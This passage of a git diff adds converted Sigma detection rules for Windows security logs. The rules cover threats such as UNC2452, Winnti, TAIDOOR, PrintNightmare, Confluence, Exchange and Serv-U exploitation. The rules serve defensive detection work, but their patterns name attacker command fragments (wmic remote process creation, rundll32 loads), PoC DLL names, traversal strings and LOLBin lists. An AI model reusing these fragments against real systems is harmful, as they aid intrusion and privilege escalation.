CommandLine|contains|all: + - .zip + - .log + selection_generic_3: + ParentCommandLine|contains|all: + - wscript.exe + - .vbs + CommandLine|contains|all: + - rundll32.exe + - C:\Windows + - .dll,Tk_ + selection_generic_4: + ParentCommandLine|contains: + - C:\Windows + - .dll + CommandLine|contains: 'cmd.exe /C ' + ParentProcessName|endswith: \rundll32.exe + selection_generic_5: + CommandLine: '' + ParentProcessName|endswith: \rundll32.exe + NewProcessName|endswith: \dllhost.exe + condition: process_creation and (1 of selection_generic_*) +falsepositives: + - Unknown +level: high +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2020/TA/SolarWinds-Supply-Chain/proc_creation_win_apt_unc2452_ps.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2020/TA/SolarWinds-Supply-Chain/proc_creation_win_apt_unc2452_ps.yml new file mode 100644 index 000000000..08ee32a67 --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2020/TA/SolarWinds-Supply-Chain/proc_creation_win_apt_unc2452_ps.yml @@ -0,0 +1,37 @@ +title: UNC2452 PowerShell Pattern +id: b7155193-8a81-4d8f-805d-88de864ca50c +status: test +description: Detects a specific PowerShell command line pattern used by the UNC2452 actors as mentioned in Microsoft and Symantec reports +references: + - https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/solarwinds-raindrop-malware + - https://www.microsoft.com/security/blog/2020/12/18/analyzing-solorigate-the-compromised-dll-file-that-started-a-sophisticated-cyberattack-and-how-microsoft-defender-helps-protect/ + - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1047/T1047.md#atomic-test-7---create-a-process-using-wmi-query-and-an-encoded-command +author: Florian Roth (Nextron Systems) +date: 2021/01/20 +modified: 2022/10/09 +tags: + - attack.execution + - attack.t1059.001 + - attack.t1047 + - detection.emerging_threats + # - sunburst +logsource: + category: process_creation + product: windows +detection: + process_creation: + EventID: 4688 + Channel: Security + selection_cli_1: + CommandLine|contains|all: + - Invoke-WMIMethod win32_process -name create -argumentlist + - rundll32 c:\windows + selection_cli_2: + CommandLine|contains|all: + - 'wmic /node:' + - process call create "rundll32 c:\windows + condition: process_creation and (1 of selection_*) +falsepositives: + - Unlikely +level: critical +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2020/TA/SolarWinds-Supply-Chain/proc_creation_win_apt_unc2452_vbscript_pattern.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2020/TA/SolarWinds-Supply-Chain/proc_creation_win_apt_unc2452_vbscript_pattern.yml new file mode 100644 index 000000000..4c88c59f0 --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2020/TA/SolarWinds-Supply-Chain/proc_creation_win_apt_unc2452_vbscript_pattern.yml @@ -0,0 +1,34 @@ +title: Suspicious VBScript UN2452 Pattern +id: 20c3f09d-c53d-4e85-8b74-6aa50e2f1b61 +status: test +description: Detects suspicious inline VBScript keywords as used by UNC2452 +references: + - https://www.microsoft.com/security/blog/2021/03/04/goldmax-goldfinder-sibot-analyzing-nobelium-malware/ +author: Florian Roth (Nextron Systems) +date: 2021/03/05 +modified: 2022/10/09 +tags: + - attack.persistence + - attack.t1547.001 + - detection.emerging_threats +logsource: + category: process_creation + product: windows +detection: + process_creation: + EventID: 4688 + Channel: Security + selection: + CommandLine|contains|all: + - Execute + - CreateObject + - RegRead + - window.close + - \Microsoft\Windows\CurrentVersion + filter: + CommandLine|contains: \Software\Microsoft\Windows\CurrentVersion\Run + condition: process_creation and (selection and not filter) +falsepositives: + - Unknown +level: high +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2020/TA/TAIDOOR-RAT/proc_creation_win_apt_taidoor.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2020/TA/TAIDOOR-RAT/proc_creation_win_apt_taidoor.yml new file mode 100644 index 000000000..16b628b3d --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2020/TA/TAIDOOR-RAT/proc_creation_win_apt_taidoor.yml @@ -0,0 +1,33 @@ +title: TAIDOOR RAT DLL Load +id: d1aa3382-abab-446f-96ea-4de52908210b +status: test +description: Detects specific process characteristics of Chinese TAIDOOR RAT malware load +references: + - https://us-cert.cisa.gov/ncas/analysis-reports/ar20-216a +author: Florian Roth (Nextron Systems) +date: 2020/07/30 +modified: 2021/11/27 +tags: + - attack.execution + - attack.t1055.001 + - detection.emerging_threats +logsource: + category: process_creation + product: windows +detection: + process_creation: + EventID: 4688 + Channel: Security + selection1: + CommandLine|contains: + - dll,MyStart + - dll MyStart + selection2a: + CommandLine|endswith: ' MyStart' + selection2b: + CommandLine|contains: rundll32.exe + condition: process_creation and (selection1 or ( selection2a and selection2b )) +falsepositives: + - Unknown +level: high +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2020/TA/Winnti/proc_creation_win_apt_winnti_mal_hk_jan20.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2020/TA/Winnti/proc_creation_win_apt_winnti_mal_hk_jan20.yml new file mode 100644 index 000000000..6b0ce0a17 --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2020/TA/Winnti/proc_creation_win_apt_winnti_mal_hk_jan20.yml @@ -0,0 +1,42 @@ +title: Winnti Malware HK University Campaign +id: 3121461b-5aa0-4a41-b910-66d25524edbb +status: test +description: Detects specific process characteristics of Winnti malware noticed in Dec/Jan 2020 in a campaign against Honk Kong universities +references: + - https://www.welivesecurity.com/2020/01/31/winnti-group-targeting-universities-hong-kong/ +author: Florian Roth (Nextron Systems), Markus Neis +date: 2020/02/01 +modified: 2021/11/27 +tags: + - attack.defense_evasion + - attack.t1574.002 + - attack.g0044 + - detection.emerging_threats +logsource: + category: process_creation + product: windows +detection: + process_creation: + EventID: 4688 + Channel: Security + selection1: + ParentProcessName|contains: + - C:\Windows\Temp + - \hpqhvind.exe + NewProcessName|startswith: C:\ProgramData\DRM + selection2: + ParentProcessName|startswith: C:\ProgramData\DRM + NewProcessName|endswith: \wmplayer.exe + selection3: + ParentProcessName|endswith: \Test.exe + NewProcessName|endswith: \wmplayer.exe + selection4: + NewProcessName: C:\ProgramData\DRM\CLR\CLR.exe + selection5: + ParentProcessName|startswith: C:\ProgramData\DRM\Windows + NewProcessName|endswith: \SearchFilterHost.exe + condition: process_creation and (1 of selection*) +falsepositives: + - Unlikely +level: critical +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2020/TA/Winnti/proc_creation_win_apt_winnti_pipemon.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2020/TA/Winnti/proc_creation_win_apt_winnti_pipemon.yml new file mode 100644 index 000000000..79e0e4db9 --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2020/TA/Winnti/proc_creation_win_apt_winnti_pipemon.yml @@ -0,0 +1,34 @@ +title: Winnti Pipemon Characteristics +id: 73d70463-75c9-4258-92c6-17500fe972f2 +status: stable +description: Detects specific process characteristics of Winnti Pipemon malware reported by ESET +references: + - https://www.welivesecurity.com/2020/05/21/no-game-over-winnti-group/ +author: Florian Roth (Nextron Systems), oscd.community +date: 2020/07/30 +modified: 2021/11/27 +tags: + - attack.defense_evasion + - attack.t1574.002 + - attack.g0044 + - detection.emerging_threats +logsource: + category: process_creation + product: windows +detection: + process_creation: + EventID: 4688 + Channel: Security + selection_1: + CommandLine|contains: setup0.exe -p + selection_2: + CommandLine|contains: setup.exe + CommandLine|endswith: + - -x:0 + - -x:1 + - -x:2 + condition: process_creation and (1 of selection_*) +falsepositives: + - Legitimate setups that use similar flags +level: critical +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2021/Exploits/CVE-2021-1675/av_printernightmare_cve_2021_34527.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2021/Exploits/CVE-2021-1675/av_printernightmare_cve_2021_34527.yml new file mode 100644 index 000000000..4b2d5c861 --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2021/Exploits/CVE-2021-1675/av_printernightmare_cve_2021_34527.yml @@ -0,0 +1,45 @@ +title: Antivirus PrinterNightmare CVE-2021-34527 Exploit Detection +id: 6fe1719e-ecdf-4caf-bffe-4f501cb0a561 +status: stable +description: Detects the suspicious file that is created from PoC code against Windows Print Spooler Remote Code Execution Vulnerability CVE-2021-34527 (PrinterNightmare), CVE-2021-1675 . +references: + - https://twitter.com/mvelazco/status/1410291741241102338 + - https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1675 + - https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527 +author: Sittikorn S, Nuttakorn T, Tim Shelton +date: 2021/07/01 +modified: 2023/10/23 +tags: + - attack.privilege_escalation + - attack.t1055 +logsource: + category: antivirus + product: windows + service: windefend +detection: + antivirus: + EventID: # https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/troubleshoot-microsoft-defender-antivirus IDs with existing 'Threat Name' or 'Path' + - 1006 + - 1007 + - 1008 + - 1009 + - 1010 + - 1011 + - 1012 + - 1115 + - 1116 + - 1017 + - 1018 + - 1019 + - 1115 + - 1116 + Channel: Microsoft-Windows-Windows Defender/Operational + selection: + Path|contains: :\Windows\System32\spool\drivers\x64\ + keywords: + - File submitted to Symantec # symantec fp, pending analysis, more generic + condition: antivirus and (selection and not keywords) +falsepositives: + - Unlikely, or pending PSP analysis +level: critical +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2021/Exploits/CVE-2021-1675/win_exploit_cve_2021_1675_printspooler.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2021/Exploits/CVE-2021-1675/win_exploit_cve_2021_1675_printspooler.yml new file mode 100644 index 000000000..c2eef25e8 --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2021/Exploits/CVE-2021-1675/win_exploit_cve_2021_1675_printspooler.yml @@ -0,0 +1,47 @@ +title: Possible CVE-2021-1675 Print Spooler Exploitation +id: 4e64668a-4da1-49f5-a8df-9e2d5b866718 +status: test +description: Detects events of driver load errors in print service logs that could be a sign of successful exploitation attempts of print spooler vulnerability CVE-2021-1675 +references: + - https://github.com/hhlxf/PrintNightmare + - https://github.com/afwu/PrintNightmare + - https://twitter.com/fuzzyf10w/status/1410202370835898371 +author: Florian Roth (Nextron Systems), KevTheHermit, fuzzyf10w, Tim Shelton +date: 2021/06/30 +modified: 2022/11/15 +tags: + - attack.execution + - attack.t1569 + - cve.2021.1675 + - detection.emerging_threats +logsource: + product: windows + service: printservice-admin +detection: + printservice_admin: + Channel: Microsoft-Windows-PrintService/Admin + selection: + EventID: 808 + ErrorCode: + - '0x45A' + - '0x7e' + keywords: + - The print spooler failed to load a plug-in module + # default file names used in PoC codes + - MyExploit.dll + - evil.dll + - \addCube.dll + - \rev.dll + - \rev2.dll + - \main64.dll + - \mimilib.dll + - \mimispool.dll + falsepositive: + - ' registration timed out' # ex: The print spooler failed to load a plug-in module PrintConfig registration timed out + condition: printservice_admin and ((selection or keywords) and not falsepositive) +fields: + - PluginDllName +falsepositives: + - Problems with printer drivers +level: high +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2021/Exploits/CVE-2021-1675/win_exploit_cve_2021_1675_printspooler_operational.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2021/Exploits/CVE-2021-1675/win_exploit_cve_2021_1675_printspooler_operational.yml new file mode 100644 index 000000000..caf656ee0 --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2021/Exploits/CVE-2021-1675/win_exploit_cve_2021_1675_printspooler_operational.yml @@ -0,0 +1,34 @@ +title: CVE-2021-1675 Print Spooler Exploitation +id: f34d942d-c8c4-4f1f-b196-22471aecf10a +status: test +description: Detects driver load events print service operational log that are a sign of successful exploitation attempts against print spooler vulnerability CVE-2021-1675 +references: + - https://twitter.com/MalwareJake/status/1410421967463731200 +author: Florian Roth (Nextron Systems) +date: 2021/07/01 +modified: 2022/10/09 +tags: + - attack.execution + - attack.t1569 + - cve.2021.1675 + - detection.emerging_threats +logsource: + product: windows + service: printservice-operational +detection: + printservice_operational: + Channel: Microsoft-Windows-PrintService/Operational + selection: + EventID: 316 + keywords: + - 'UNIDRV.DLL, kernelbase.dll, ' + - ' 123 ' + - ' 1234 ' + - mimispool + condition: printservice_operational and (selection and keywords) +fields: + - DriverAdded +falsepositives: + - Unknown +level: critical +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2021/Exploits/CVE-2021-1675/win_security_exploit_cve_2021_1675_printspooler_security.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2021/Exploits/CVE-2021-1675/win_security_exploit_cve_2021_1675_printspooler_security.yml new file mode 100644 index 000000000..4b2792344 --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2021/Exploits/CVE-2021-1675/win_security_exploit_cve_2021_1675_printspooler_security.yml @@ -0,0 +1,32 @@ +title: CVE-2021-1675 Print Spooler Exploitation IPC Access +id: 8fe1c584-ee61-444b-be21-e9054b229694 +status: test +description: Detects remote printer driver load from Detailed File Share in Security logs that are a sign of successful exploitation attempts against print spooler vulnerability CVE-2021-1675 and CVE-2021-34527 +references: + - https://twitter.com/INIT_3/status/1410662463641731075 +author: INIT_6 +date: 2021/07/02 +modified: 2022/10/05 +tags: + - attack.execution + - attack.t1569 + - cve.2021.1675 + - cve.2021.34527 + - detection.emerging_threats +logsource: + product: windows + service: security +detection: + security: + Channel: Security + selection: + EventID: 5145 + ShareName: \\\\\*\\IPC$ # looking for the string \\*\IPC$ + RelativeTargetName: spoolss + AccessMask: '0x3' + ObjectType: File + condition: security and selection +falsepositives: + - Unknown +level: critical +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2021/Exploits/CVE-2021-26084/proc_creation_win_exploit_cve_2021_26084_atlassian_confluence.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2021/Exploits/CVE-2021-26084/proc_creation_win_exploit_cve_2021_26084_atlassian_confluence.yml new file mode 100644 index 000000000..cfa8f9d99 --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2021/Exploits/CVE-2021-26084/proc_creation_win_exploit_cve_2021_26084_atlassian_confluence.yml @@ -0,0 +1,46 @@ +title: Potential Atlassian Confluence CVE-2021-26084 Exploitation Attempt +id: 245f92e3-c4da-45f1-9070-bc552e06db11 +status: test +description: Detects spawning of suspicious child processes by Atlassian Confluence server which may indicate successful exploitation of CVE-2021-26084 +references: + - https://nvd.nist.gov/vuln/detail/CVE-2021-26084 + - https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html + - https://github.com/h3v0x/CVE-2021-26084_Confluence +author: Bhabesh Raj +date: 2021/09/08 +modified: 2023/02/13 +tags: + - attack.initial_access + - attack.execution + - attack.t1190 + - attack.t1059 + - cve.2021.26084 + - detection.emerging_threats +logsource: + category: process_creation + product: windows +detection: + process_creation: + EventID: 4688 + Channel: Security + selection: + # Monitor suspicious child processes spawned by Confluence + CommandLine|contains: + - certutil + - cmd /c + - cmd /k + - cscript + - curl + - ipconfig + - powershell + - pwsh + - regsvr32 + - rundll32 + - whoami + - wscript + ParentProcessName|endswith: \Atlassian\Confluence\jre\bin\java.exe + condition: process_creation and selection +falsepositives: + - Unknown +level: high +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2021/Exploits/CVE-2021-26857/proc_creation_win_exploit_cve_2021_26857_msexchange.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2021/Exploits/CVE-2021-26857/proc_creation_win_exploit_cve_2021_26857_msexchange.yml new file mode 100644 index 000000000..e94eb7e3c --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2021/Exploits/CVE-2021-26857/proc_creation_win_exploit_cve_2021_26857_msexchange.yml @@ -0,0 +1,32 @@ +title: Potential CVE-2021-26857 Exploitation Attempt +id: cd479ccc-d8f0-4c66-ba7d-e06286f3f887 +status: stable +description: Detects possible successful exploitation for vulnerability described in CVE-2021-26857 by looking for | abnormal subprocesses spawning by Exchange Server's Unified Messaging service +references: + - https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/ +author: Bhabesh Raj +date: 2021/03/03 +modified: 2023/02/07 +tags: + - attack.t1203 + - attack.execution + - cve.2021.26857 + - detection.emerging_threats +logsource: + category: process_creation + product: windows +detection: + process_creation: + EventID: 4688 + Channel: Security + selection: + ParentProcessName|endswith: \UMWorkerProcess.exe + filter: + NewProcessName|endswith: + - wermgr.exe + - WerFault.exe + condition: process_creation and (selection and not filter) +falsepositives: + - Unknown +level: high +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2021/Exploits/CVE-2021-35211/proc_creation_win_exploit_cve_2021_35211_servu.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2021/Exploits/CVE-2021-35211/proc_creation_win_exploit_cve_2021_35211_servu.yml new file mode 100644 index 000000000..f00a0f98b --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2021/Exploits/CVE-2021-35211/proc_creation_win_exploit_cve_2021_35211_servu.yml @@ -0,0 +1,35 @@ +title: Serv-U Exploitation CVE-2021-35211 by DEV-0322 +id: 75578840-9526-4b2a-9462-af469a45e767 +status: test +description: Detects patterns as noticed in exploitation of Serv-U CVE-2021-35211 vulnerability by threat group DEV-0322 +references: + - https://www.microsoft.com/security/blog/2021/07/13/microsoft-discovers-threat-actor-targeting-solarwinds-serv-u-software-with-0-day-exploit/ +author: Florian Roth (Nextron Systems) +date: 2021/07/14 +modified: 2022/12/18 +tags: + - attack.persistence + - attack.t1136.001 + - cve.2021.35211 + - detection.emerging_threats + # - threat_group.DEV-0322 +logsource: + category: process_creation + product: windows +detection: + process_creation: + EventID: 4688 + Channel: Security + selection_whoami: + CommandLine|contains: whoami + selection_cmd_1: + CommandLine|contains: + - ./Client/Common/ + - .\Client\Common\ + selection_cmd_2: + CommandLine|contains: C:\Windows\Temp\Serv-U.bat + condition: process_creation and (selection_whoami and 1 of selection_cmd*) +falsepositives: + - Unlikely +level: critical +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2021/Exploits/CVE-2021-40444/proc_creation_win_exploit_cve_2021_40444.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2021/Exploits/CVE-2021-40444/proc_creation_win_exploit_cve_2021_40444.yml new file mode 100644 index 000000000..9e22c47ec --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2021/Exploits/CVE-2021-40444/proc_creation_win_exploit_cve_2021_40444.yml @@ -0,0 +1,38 @@ +title: Potential CVE-2021-40444 Exploitation Attempt +id: 894397c6-da03-425c-a589-3d09e7d1f750 +status: test +description: Detects potential exploitation of CVE-2021-40444 via suspicious process patterns seen in in-the-wild exploitations +references: + - https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444 + - https://twitter.com/neonprimetime/status/1435584010202255375 + - https://www.joesandbox.com/analysis/476188/1/iochtml +author: Florian Roth (Nextron Systems), @neonprimetime +date: 2021/09/08 +modified: 2023/02/04 +tags: + - attack.execution + - attack.t1059 + - cve.2021.40444 + - detection.emerging_threats +logsource: + category: process_creation + product: windows +detection: + process_creation: + EventID: 4688 + Channel: Security + selection: + NewProcessName|endswith: \control.exe + ParentProcessName|endswith: + - \winword.exe + - \powerpnt.exe + - \excel.exe + filter: + CommandLine|endswith: + - \control.exe input.dll + - \control.exe" input.dll + condition: process_creation and (selection and not filter) +falsepositives: + - Unknown +level: high +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2021/Exploits/CVE-2021-40444/proc_creation_win_exploit_cve_2021_40444_office_directory_traversal.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2021/Exploits/CVE-2021-40444/proc_creation_win_exploit_cve_2021_40444_office_directory_traversal.yml new file mode 100644 index 000000000..76b60849e --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2021/Exploits/CVE-2021-40444/proc_creation_win_exploit_cve_2021_40444_office_directory_traversal.yml @@ -0,0 +1,41 @@ +title: Potential Exploitation Attempt From Office Application +id: 868955d9-697e-45d4-a3da-360cefd7c216 +status: test +description: Detects Office applications executing a child process that includes directory traversal patterns. This could be an attempt to exploit CVE-2022-30190 (MSDT RCE) or CVE-2021-40444 (MSHTML RCE) +references: + - https://twitter.com/sbousseaden/status/1531653369546301440 + - https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-40444 + - https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30190 +author: Christian Burkard (Nextron Systems), @SBousseaden (idea) +date: 2022/06/02 +modified: 2023/02/04 +tags: + - attack.execution + - attack.defense_evasion + - cve.2021.40444 + - detection.emerging_threats +logsource: + product: windows + category: process_creation +detection: + process_creation: + EventID: 4688 + Channel: Security + selection: + CommandLine|contains: + - ../../../.. + - ..\..\..\.. + - ..//..//..//.. + ParentProcessName|endswith: + - \winword.exe + - \excel.exe + - \powerpnt.exe + - \msaccess.exe + - \mspub.exe + - \eqnedt32.exe + - \visio.exe + condition: process_creation and selection +falsepositives: + - Unknown +level: high +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2021/Exploits/CVE-2021-41379/proc_creation_win_exploit_cve_2021_41379.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2021/Exploits/CVE-2021-41379/proc_creation_win_exploit_cve_2021_41379.yml new file mode 100644 index 000000000..27d810c6e --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2021/Exploits/CVE-2021-41379/proc_creation_win_exploit_cve_2021_41379.yml @@ -0,0 +1,41 @@ +title: Potential CVE-2021-41379 Exploitation Attempt +id: af8bbce4-f751-46b4-8d91-82a33a736f61 +status: test +description: Detects potential exploitation attempts of CVE-2021-41379 (InstallerFileTakeOver), a local privilege escalation (LPE) vulnerability where the attacker spawns a "cmd.exe" process as a child of Microsoft Edge elevation service "elevation_service" with "LOCAL_SYSTEM" rights +references: + - https://web.archive.org/web/20220421061949/https://github.com/klinix5/InstallerFileTakeOver + - https://www.bleepingcomputer.com/news/microsoft/new-windows-zero-day-with-public-exploit-lets-you-become-an-admin/ + - https://www.zerodayinitiative.com/advisories/ZDI-21-1308/ + - https://www.logpoint.com/en/blog/detecting-privilege-escalation-zero-day-cve-2021-41379/ +author: Florian Roth (Nextron Systems) +date: 2021/11/22 +modified: 2023/02/13 +tags: + - attack.privilege_escalation + - attack.t1068 + - cve.2021.41379 + - detection.emerging_threats +logsource: + category: process_creation + product: windows +detection: + process_creation: + EventID: 4688 + Channel: Security + selection_img: + - NewProcessName|endswith: + - \cmd.exe + - \powershell.exe + - \pwsh.exe + - OriginalFileName: + - Cmd.Exe + - PowerShell.EXE + - pwsh.dll + selection_parent: + ParentProcessName|endswith: \elevation_service.exe + MandatoryLabel: S-1-16-16384 + condition: process_creation and (all of selection_*) +falsepositives: + - Unknown +level: critical +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2021/Exploits/CVE-2021-41379/win_vul_cve_2021_41379.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2021/Exploits/CVE-2021-41379/win_vul_cve_2021_41379.yml new file mode 100644 index 000000000..a1c4090e3 --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2021/Exploits/CVE-2021-41379/win_vul_cve_2021_41379.yml @@ -0,0 +1,29 @@ +title: LPE InstallerFileTakeOver PoC CVE-2021-41379 +id: 7dbb86de-a0cc-494c-8aa8-b2996c9ef3c8 +status: test +description: Detects PoC tool used to exploit LPE vulnerability CVE-2021-41379 +references: + - https://github.com/klinix5/InstallerFileTakeOver +author: Florian Roth (Nextron Systems) +date: 2021/11/22 +modified: 2022/07/12 +tags: + - attack.initial_access + - attack.t1190 + - detection.emerging_threats +logsource: + product: windows + service: application + # warning: The 'data' field used in the detection section is the container for the event data as a whole. You may have to adapt the rule for your backend accordingly +detection: + application: + Channel: Application + selection: + EventID: 1033 + Provider_Name: MsiInstaller + Data|contains: test pkg + condition: application and selection +falsepositives: + - Other MSI packages for which your admins have used that name +level: high +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2021/Exploits/CVE-2021-42278/win_system_exploit_cve_2021_42278.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2021/Exploits/CVE-2021-42278/win_system_exploit_cve_2021_42278.yml new file mode 100644 index 000000000..dad2d257f --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2021/Exploits/CVE-2021-42278/win_system_exploit_cve_2021_42278.yml @@ -0,0 +1,40 @@ +title: Potential CVE-2021-42278 Exploitation Attempt +id: 44bbff3e-4ca3-452d-a49a-6efa4cafa06f +related: + - id: e80a0fee-1a62-4419-b31e-0d0db6e6013a + type: similar +status: test +description: | + The attacker creates a computer object using those permissions with a password known to her. + After that she clears the attribute ServicePrincipalName on the computer object. + Because she created the object (CREATOR OWNER), she gets granted additional permissions and can do many changes to the object. +references: + - https://cloudbrothers.info/en/exploit-kerberos-samaccountname-spoofing/ +author: frack113 +date: 2021/12/15 +modified: 2023/04/14 +tags: + - attack.credential_access + - attack.t1558.003 + - cve.2021.42278 + - detection.emerging_threats +logsource: + product: windows + service: system +detection: + system: + Channel: System + selection: + Provider_Name: Microsoft-Windows-Kerberos-Key-Distribution-Center # Active Directory + EventID: + - 35 # PAC without attributes + - 36 # Ticket without a PAC + - 37 # Ticket without Requestor + - 38 # Requestor Mismatch + condition: system and selection +falsepositives: + - Unknown +fields: + - samAccountName +level: medium +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2021/Exploits/CVE-2021-42287/win_security_samaccountname_spoofing_cve_2021_42287.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2021/Exploits/CVE-2021-42287/win_security_samaccountname_spoofing_cve_2021_42287.yml new file mode 100644 index 000000000..f8b3669b4 --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2021/Exploits/CVE-2021-42287/win_security_samaccountname_spoofing_cve_2021_42287.yml @@ -0,0 +1,35 @@ +title: Suspicious Computer Account Name Change CVE-2021-42287 +id: 45eb2ae2-9aa2-4c3a-99a5-6e5077655466 +status: test +description: Detects the renaming of an existing computer account to a account name that doesn't contain a $ symbol as seen in attacks against CVE-2021-42287 +references: + - https://medium.com/@mvelazco/hunting-for-samaccountname-spoofing-cve-2021-42287-and-domain-controller-impersonation-f704513c8a45 +author: Florian Roth (Nextron Systems) +date: 2021/12/22 +modified: 2022/12/25 +tags: + - cve.2021.42287 + - detection.emerging_threats + - attack.defense_evasion + - attack.persistence + - attack.t1036 + - attack.t1098 +logsource: + product: windows + service: security +detection: + security: + Channel: Security + selection: + EventID: 4781 # rename user + OldTargetUserName|contains: $ + filter: + NewTargetUserName|contains: $ + condition: security and (selection and not filter) +falsepositives: + - Unknown +fields: + - EventID + - SubjectUserName +level: high +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2021/Exploits/RazerInstaller-LPE-Exploit/proc_creation_win_exploit_other_razorinstaller_lpe.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2021/Exploits/RazerInstaller-LPE-Exploit/proc_creation_win_exploit_other_razorinstaller_lpe.yml new file mode 100644 index 000000000..da9ea7a6f --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2021/Exploits/RazerInstaller-LPE-Exploit/proc_creation_win_exploit_other_razorinstaller_lpe.yml @@ -0,0 +1,31 @@ +title: Suspicious RazerInstaller Explorer Subprocess +id: a4eaf250-7dc1-4842-862a-5e71cd59a167 +status: test +description: Detects a explorer.exe sub process of the RazerInstaller software which can be invoked from the installer to select a different installation folder but can also be exploited to escalate privileges to LOCAL SYSTEM +references: + - https://twitter.com/j0nh4t/status/1429049506021138437 + - https://streamable.com/q2dsji +author: Florian Roth (Nextron Systems), Maxime Thiebaut +date: 2021/08/23 +modified: 2022/10/09 +tags: + - attack.privilege_escalation + - attack.t1553 + - detection.emerging_threats +logsource: + category: process_creation + product: windows +detection: + process_creation: + EventID: 4688 + Channel: Security + selection: + ParentProcessName|endswith: \RazerInstaller.exe + MandatoryLabel: S-1-16-16384 + filter: + NewProcessName|startswith: C:\Windows\Installer\Razer\Installer\ + condition: process_creation and (selection and not filter) +falsepositives: + - User selecting a different installation folder (check for other sub processes of this explorer.exe process) +level: high +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2021/Exploits/SystemNightmare-Exploit/proc_creation_win_exploit_other_systemnightmare.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2021/Exploits/SystemNightmare-Exploit/proc_creation_win_exploit_other_systemnightmare.yml new file mode 100644 index 000000000..e0c9bd606 --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2021/Exploits/SystemNightmare-Exploit/proc_creation_win_exploit_other_systemnightmare.yml @@ -0,0 +1,30 @@ +title: Potential SystemNightmare Exploitation Attempt +id: c01f7bd6-0c1d-47aa-9c61-187b91273a16 +status: test +description: Detects an exploitation attempt of SystemNightmare in order to obtain a shell as LOCAL_SYSTEM +references: + - https://github.com/GossiTheDog/SystemNightmare +author: Florian Roth (Nextron Systems) +date: 2021/08/11 +modified: 2023/02/04 +tags: + - attack.privilege_escalation + - attack.t1068 + - detection.emerging_threats +logsource: + category: process_creation + product: windows +detection: + process_creation: + EventID: 4688 + Channel: Security + selection: + CommandLine|contains: + - printnightmare.gentilkiwi.com + - ' /user:gentilguest ' + - Kiwi 